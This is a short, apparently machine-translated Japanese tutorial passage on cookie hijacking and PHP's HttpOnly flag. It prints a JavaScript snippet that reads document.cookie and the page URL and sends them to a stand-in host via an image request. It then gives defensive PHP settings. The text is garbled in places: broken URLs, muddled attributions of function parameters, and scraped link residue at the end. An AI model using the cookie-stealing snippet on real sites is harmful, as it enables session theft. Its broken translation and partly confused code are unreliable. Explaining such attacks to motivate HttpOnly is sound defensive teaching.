ハイジャックの概念は言うまでもなく、機密情報(ID情報、管理者情報)などが大量に含まれていれば終わりです。 。 。
Cookie情報の取得には以下のjsを使用します:
コードをコピーします コードは次のとおりです:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http ://www .test.com/c.php?c='+cookie+'&u='+url;
通常、Cookie はドキュメント オブジェクトから取得されます。ブラウザが Cookie を設定する場合、ドメインなどの他のパラメータと同様に、HttpOnly というパラメータを受け入れるようになります。クッキーを見てください。
PHP 設定 HttpOnly:
コードをコピーします コードは次のとおりです:
//php.iniでは、session.cookie_httponly = グローバルCookie HttpOnly属性を有効にします
ini_set("session.cookie_httponly", 1);
/ /または setcookie() の 7 番目のパラメータを true に設定します
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
PHP5.1 パスより前の PHP バージョンの場合:
コードをコピーします コードは次のとおりです:
header("Set-Cookie: hidden=value; httpOnly");
最後に、HttpOnly は万能薬ではありません。
http://www.bkjia.com/PHPjc/744327.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/744327.html技術記事言うまでもなく、
のコンセプト
![[Web フロントエンド] Node.js クイック スタート](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
